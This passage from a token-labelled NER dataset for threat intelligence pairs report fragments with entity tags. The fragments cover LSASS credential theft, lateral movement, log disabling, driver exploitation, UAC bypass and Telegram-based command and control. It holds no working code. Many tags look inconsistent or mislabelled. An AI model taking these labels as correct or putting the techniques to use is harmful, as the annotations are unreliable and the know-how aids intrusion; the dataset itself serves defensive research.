"O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "accesses", - "the", - "memory", - "of", - "its", - "host", - "LSASS", - "process", - "and", - "stores", - "stolen", - "credentials", - "in", - "a", - "Mimikatz", - "log", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "of", - "a", - "Security", - "Package", - "into", - "LSASS", - "using", - "RPC", - "calls." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "steals", - "credentials", - "from", - "LSASS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "used", - "C:\\MS_DATA", - "as", - "their", - "main", - "working", - "directory", - "for", - "storing", - "malware", - "and", - "staging", - "data", - "for", - "exfiltration" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "Remote", - "Desktop", - "user", - "sessions." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd\"", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "cmd\"", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "cmd\"", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "They", - "also", - "retrieve", - "networking", - "information,", - "like", - "network", - "adapters,", - "specific", - "machines,", - "and", - "network", - "services", - "like", - "Remote", - "Desktop", - "Protocol", - "(RDP)." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "lateral", - "movement,", - "the", - "attackers", - "made", - "use", - "of", - "the", - "PsExec", - "tool", - "and", - "the", - "net", - "use", - "command", - "for", - "accessing", - "shared", - "resources", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "PsExec", - "Windows", - "Sysinternals", - "tool", - "and", - "net", - "for", - "lateral", - "movement", - "and", - "exploration" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loads", - "and", - "executes", - "the", - "decrypted" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "pc.exe", - "decrypts", - "AddSecurityPackage64.dll", - "and", - "pc.dll", - "using", - "the", - "AES", - "encryption", - "algorithm" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "pc.dll", - "decrypts," - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Disabling", - "Windows", - "event", - "logging", - "in", - "an", - "attempt", - "to", - "evade", - "detection" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "an", - "attempt", - "to", - "remain", - "undetected,", - "AddSecurityPackage64.dll", - "disables", - "Windows", - "event", - "logging", - "by", - "killing", - "threads", - "of", - "the", - "Windows", - "Event", - "Log", - "service", - "without", - "stopping", - "the", - "execution", - "of", - "the", - "service", - "itself" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injecting", - "pc.dll", - "into", - "LSASS", - "as", - "a", - "Security", - "Package" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "execute", - "malicious", - "code", - "in", - "the", - "context", - "of", - "LSASS." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "enumerating", - "the", - "processes’", - "threads," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "tasklist" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "informationAddSecurityPackage64.dll", - "injects", - "pc.dll", - "into", - "LSASS", - "by", - "deploying", - "pc.dll", - "as", - "a", - "Security", - "Package" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "embedded", - "JavaScript", - "Observed", - "Notation", - "(JSON)-based", - "configuration", - "to", - "set", - "parameters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "text-encoded", - "in", - "base64" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "brute-force", - "attacks" - ], - "ner_tags": [ - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "brute-forcing", - "and", - "compromising", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valid", - "credentials" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "uploaded", - "to", - "the", - "command-and-control", - "(C&C)", - "server," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "usually", - "at", - "port", - "5028/TCP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "several", - "highly", - "obfuscated", - "and", - "underdevelopment", - "custom", - "loaders" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "malicious", - "RAR", - "archive" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploits", - "CVE-2015-2291,", - "an", - "Intel", - "driver", - "vulnerability,", - "to", - "load", - "a", - "malicious", - "driver", - "designed", - "to", - "reduce", - "the", - "token", - "integrity", - "of", - "Microsoft", - "Defender." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deploying", - "a", - "malicious", - "kernel", - "mode", - "driver", - "(“bring", - "your", - "own", - "vulnerable", - "driver”", - "or", - "BYOVD", - "method)", - "via", - "exploiting", - "a", - "vulnerable", - "Intel", - "driver" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "install", - "an", - "information", - "stealer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stealer," - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "keylogger", - "with", - "logging", - "capabilities", - "using", - "the", - "Telegram", - "API" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "distributed", - "to", - "victims", - "via", - "phishing", - "attempts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "embedded", - "binary", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "archive", - "contains", - "the", - "files," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscate,", - "decompress," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "strings" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscation,", - "and", - "decompression" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decompressing" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decompresses", - "it", - "using", - "the", - "GZipStream", - "API," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "masquerades", - "as", - "a", - "legitimate", - "word", - "document" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "legitimize", - "the", - "package", - "in", - "the", - "eyes", - "of", - "the", - "victim" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "designed", - "to", - "lure", - "unsuspecting", - "victims", - "into", - "executing", - "the", - "loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "executed", - "by", - "the", - "victim" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilizes", - "Telegram", - "for", - "delivering", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "send", - "program", - "execution", - "DEBUG", - "and", - "Telegram", - "to", - "deliver", - "payloads", - "and", - "send", - "commands." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "next", - "part" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilizes", - "Telegram", - "for", - "delivering", - "payloads,", - "sending", - "commands,", - "and", - "receiving", - "the", - "payload", - "heartbeat." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "send", - "commands." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "a", - "request", - "to", - "the", - "attacker-controlled", - "Telegram", - "channel" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "the", - "message", - "\"bot", - "getted\"", - "to", - "the", - "debug", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "accepts", - "commands", - "from", - "a", - "Telegram", - "channel," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "message", - "to", - "both", - "the", - "Debug", - "server", - "and", - "the", - "Telegram", - "channel," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "a", - "GET", - "request", - "to", - "https://api[.]telegram[.]org/bot{token}/getUpdates", - "to", - "retrieve", - "the", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "API", - "hashing" - ], - "ner_tags": [ - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "resolves", - "hashed", - "Windows", - "APIs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "conceal", - "the", - "utilization", - "of", - "potentially", - "suspicious", - "APIs", - "(functions)", - "from", - "static", - "detection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "replacing", - "the", - "human-readable", - "names", - "of", - "functions", - "(such", - "as", - "\"CreateMutexW\")", - "with", - "a", - "hash", - "value," - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "in", - "the", - "code", - "to", - "call", - "the", - "corresponding", - "API", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "employs", - "dynamic", - "API", - "resolving", - "to", - "conceal", - "its", - "API", - "imports" - ], - "ner_tags": [ - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "storing", - "the", - "names", - "or", - "hashes", - "of", - "the", - "APIs", - "needed,", - "then", - "importing", - "them", - "dynamically", - "at", - "runtime." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "two", - "arguments", - "to", - "the", - "\"mw_resolveAPI\"", - "function." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "resolves", - "the", - "given", - "API", - "hash", - "and", - "retrieves", - "the", - "address", - "of", - "an", - "exported", - "function" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "hash", - "for", - "each", - "export", - "function", - "name" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "string", - "encryption," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "irrelevant", - "code" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "LoadLibrary", - "and", - "GetProcAddress", - "functions" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Compressapi" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "GetTokenInformation", - "API." - ], - "ner_tags": [ - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "retrieves", - "the", - "MachineGuid", - "of", - "the", - "infected", - "system", - "from", - "the", - "SOFTWARE\\Microsoft\\Cryptography\\MachineGuid", - "registry", - "key" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "retrieves", - "the", - "MachineGuid", - "of", - "the", - "infected", - "system", - "from", - "the", - "\"SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\"", - "registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "the", - "HKCU\\SOFTWARE\\Intel", - "registry", - "key", - "and", - "recreates", - "it" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "information", - "about", - "the", - ".NET", - "Framework", - "Setup" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "elevate", - "its", - "privileges", - "by", - "executing", - "the", - "mw_UAC_bypass", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Calling", - "Local", - "Windows", - "RPC", - "Servers", - "from", - ".NET" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "bypass", - "user", - "account", - "control", - "(UAC)", - "using", - "only", - "two", - "remote", - "procedure", - "call", - "(RPC)", - "requests" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "executes", - "an", - "export", - "function", - "called", - "\"Entry\"", - "from", - "UpdateTask.dll", - "via", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "payload", - "through", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "disable", - "Microsoft", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "patch", - "the", - "integrity", - "level", - "of", - "the", - "Microsoft", - "defender", - "(MsMpEng.exe)", - "and", - "forcibly", - "reduce", - "it", - "from", - "system", - "to", - "untrusted", - "integrity." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "determine", - "if", - "it", - "is", - "running", - "as", - "an", - "account", - "with", - "administrator", - "privileges", - "or", - "simply", - "as", - "a", - "regular", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sets", - "up", - "its", - "working", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "system", - "information", - "and", - "steals", - "user", - "information" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "tokens,", - "and", - "passwords", - "from", - "various", - "web", - "browsers", - "and", - "applications" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "captures", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "compressed", - "and", - "exfiltrated", - "to", - "the", - "attacker", - "via", - "Telegram" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "some", - "strings,", - "such", - "as", - "web", - "browser", - "paths", - "and", - "Geolocation", - "API", - "services", - "URLs,", - "are", - "encrypted", - "with", - "the", - "AES", - "algorithm", - "in", - "cipher-block", - "chaining", - "(CBC)", - "mode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gathers", - "basic", - "system", - "information," - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "for", - "the", - "infected", - "system", - "by", - "gathering", - "the", - "username", - "and", - "hostname" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "then", - "proceeds", - "to", - "gather", - "basic", - "system", - "information,", - "including", - "username,", - "computer", - "name,", - "and", - "OS", - "version," - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "System", - "info,", - "including", - "both", - "hardware", - "and", - "OS", - "info." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Collection", - "of", - "information", - "about", - "the", - "system", - "in", - "HTML", - "format" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "and", - "hostname" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "gathers", - "basic", - "system", - "information,", - "which", - "it", - "then", - "sends", - "to", - "the", - "C2," - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "a", - "list", - "of", - "process", - "names", - "and", - "IDs", - "back", - "to", - "the", - "C2" - ], - "ner_tags": [ - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "system", - "information", - "gathered", - "by", - "Domino", - "Backdoor", - "and", - "sent", - "to", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "in", - "return", - "receives", - "an", - "AES", - "encrypted", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "custom", - "algorithm", - "which", - "XOR’s", - "multiple", - "values", - "together." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "stored", - "immediately", - "before", - "the", - "encrypted", - "config", - "block." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "generates", - "a", - "random", - "32-byte", - "key,", - "which", - "it", - "encrypts", - "using", - "the", - "RSA", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "loading", - "an", - "encrypted", - "payload", - "from", - "its", - "resources" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Microsoft", - "WinCrypt", - "library", - "is", - "used", - "for", - "AES", - "encryption", - "and" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "config." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "be", - "based", - "on", - "an", - "encryption", - "algorithm", - "used", - "previously", - "in" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "gathering", - "the", - "username", - "and" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "gather", - "basic", - "system", - "information,", - "including", - "username," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "generated", - "from", - "the", - "system", - "username" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "a", - "similar", - "XOR-based", - "algorithm", - "as", - "part", - "of", - "its", - "encryption", - "mechanisms", - "during", - "communication", - "with", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "proceeds", - "to", - "gather", - "basic", - "system", - "information,", - "including", - "username,", - "computer", - "name,", - "and", - "OS", - "version,", - "which", - "it", - "then", - "encrypts", - "using", - "AES-256-CBC", - "and", - "the", - "generated," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "sends", - "the", - "AES-encrypted", - "system", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "data", - "is", - "then", - "encrypted", - "using", - "AES", - "and", - "returned", - "to", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "config", - "contains", - "two", - "pipe-delimited", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "decrypts", - "them", - "using", - "XOR", - "and", - "the", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "then", - "proceeds", - "to", - "decrypt", - "its", - "configuration", - "block," - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "config", - "is", - "decrypted", - "using", - "XOR", - "and", - "a", - "16-byte", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "second", - "config", - "block,", - "which", - "is", - "decrypted", - "separately" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "data", - "consists", - "of", - "a", - "4", - "byte", - "size" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "then", - "decrypts", - "the", - "received", - "payload", - "using", - "AES", - "and", - "the", - "shared", - "key." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "decrypts", - "to", - "the", - "following", - "5", - "bytes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "it", - "using", - "AES-256-CBC", - "and", - "a", - "hardcoded", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "data", - "consists", - "of", - "4", - "bytes", - "containing", - "the", - "payload", - "size," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "Microsoft", - "WinCrypt", - "library", - "is", - "used", - "for", - "AES", - "encryption", - "and", - "decryption", - "by", - "both" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "decrypted", - "using", - "XOR", - "and", - "a", - "16-byte", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "the", - "decrypted", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loads", - "the", - "resources", - "using", - "the", - "API", - "calls", - "LdrFindResource_U", - "and", - "LdrAccessResource" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "and", - "execute", - "the", - "file", - "using", - "CreateProcessA." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "utilising", - "similar", - "API", - "calls," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "enumerates", - "the", - "running", - "processes", - "on", - "the", - "system", - "and", - "compiles", - "a", - "list", - "of", - "process", - "names", 